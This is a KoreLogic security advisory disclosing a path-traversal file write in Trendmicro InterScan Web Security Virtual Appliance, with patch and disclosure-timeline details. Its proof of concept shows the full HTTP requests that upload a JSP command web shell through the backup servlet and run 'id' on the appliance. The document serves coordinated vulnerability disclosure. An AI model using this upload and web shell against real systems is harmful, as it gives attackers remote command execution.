KL-001-2017-001 : Trendmicro InterScan Arbitrary File Write Title: Trendmicro InterScan Arbitrary File Write Advisory ID: KL-001-2017-001 Publication Date: 2017.02.15 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-001.txt 1. Vulnerability Details Affected Vendor: Trendmicro Affected Product: InterScan Web Security Virtual Appliance Affected Version: OS Version 3.5.1321.el6.x86_64; Application Version 6.5-SP2_Build_Linux_1548 Platform: Embedded Linux CWE Classification: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type Impact: Remote Code Execution Attack vector: HTTP 2. Vulnerability Description An authenticated user can create files on the local system. This can lead to remote command execution as an authenticated user. 3. Technical Description A servlet takes an arbitrary file path as an output filename, and the webserver can create files in the webroot. So, a malicious .jsp can be uploaded and then executed through a subsequent request to the webserver. Shell courtesy the fuzzdb-project (https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/jsp/cmd.jsp). POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=upload_check HTTP/1.1 Host: 1.3.3.7:8443 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://1.3.3.7:8443/config_backup_collapsed.jsp Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=---------------------------135470425518767155135967265 Content-Length: 1486 -----------------------------135470425518767155135967265 Content-Disposition: form-data; name="CSRFGuardToken" 4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF -----------------------------135470425518767155135967265 Content-Disposition: form-data; name="op" save -----------------------------135470425518767155135967265 Content-Disposition: form-data; name="uploadfile"; filename="../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/korelogic.jsp" <%@ page import="java.util.*,java.io.*"%> <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> -----------------------------135470425518767155135967265 Content-Disposition: form-data; name="beFullyOrPartially" 0 -----------------------------135470425518767155135967265-- HTTP/1.1 302 Found Server: Apache-Coyote/1.1 Location: https://1.3.3.7:8443/config_backup_collapsed.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF&errorMessage=6 Content-Length: 0 Date: Tue, 25 Oct 2016 14:36:07 GMT Connection: close GET /korelogic.jsp?CSRFGuardToken=4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF&cmd=id HTTP/1.1 Host: 1.3.3.7:8443 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://1.3.3.7:8443/korelogic.jsp Cookie: JSESSIONID=E600D5296A2282C4C7AD46BCDAADEB47 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html Content-Length: 320 Date: Tue, 25 Oct 2016 14:37:58 GMT Connection: close <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <input type="hidden" name="CSRFGuardToken" value="4POCBRSFC1TYEO2D5IHNLLJAX27BNBLF"> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> Command: id<BR> uid=498(iscan) gid=499(iscan) groups=499(iscan) </pre> </BODY></HTML> 4. Mitigation and Remediation Recommendation The vendor has issued a patch for this vulnerability in Version 6.5 CP 1737. Security advisory and link to the patched version available at: https://success.trendmicro.com/solution/1116672 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2016.12.12 - KoreLogic sends vulnerability report and PoC to Trendmicro. 2016.12.15 - Trendmicro acknowledges receipt of report. 2017.01.11 - Trendmicro informs KoreLogic that the patch to this and other KoreLogic reported issues will likely be available after the 45 business day deadline (2017.02.16). 2017.02.06 - Trendmicro informs KoreLogic that the patched version will be available by 2017.02.14. 2017.02.14 - Trendmicro security advisory released. 2017.02.15 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt